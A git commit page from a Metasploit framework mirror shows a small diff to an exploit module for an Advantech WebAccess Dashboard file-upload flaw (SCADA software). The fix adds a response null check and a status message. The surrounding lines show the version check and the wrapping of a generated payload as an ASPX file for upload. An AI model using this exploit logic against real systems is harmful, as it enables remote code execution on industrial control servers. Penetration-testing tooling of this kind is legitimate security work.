infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #2 from open-security/advantech_webaccess_dashboard_file_upload 

Advantech webaccess dashboard file upload
bug/bundler_fix
504137480 2016-04-19 12:59:32 +08:00
parent e59a91cddf 0407acc0ec
commit 2400345fff
1 changed files with 5 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

7
modules/exploits/windows/scada/advantech_webaccess_dashboard_file_upload.rb
View File

@ -66,7 +66,7 @@ class MetasploitModule < Msf::Exploit::Remote
) )
end end
ver = version_match(res.body) ver = res && res.body ? version_match(res.body) : nil
true ? Gem::Version.new(ver) == Gem::Version.new('8.0') : false true ? Gem::Version.new(ver) == Gem::Version.new('8.0') : false
end end
@ -112,7 +112,10 @@ class MetasploitModule < Msf::Exploit::Remote
end end
def exploit def exploit
return unless vuln_version? unless vuln_version?
print_status("#{peer} - Cannot reliably check exploitability.")
return
end
filename = "#{Rex::Text.rand_text_alpha(5)}.aspx" filename = "#{Rex::Text.rand_text_alpha(5)}.aspx"
filedata = Msf::Util::EXE.to_exe_aspx(generate_payload_exe) filedata = Msf::Util::EXE.to_exe_aspx(generate_payload_exe)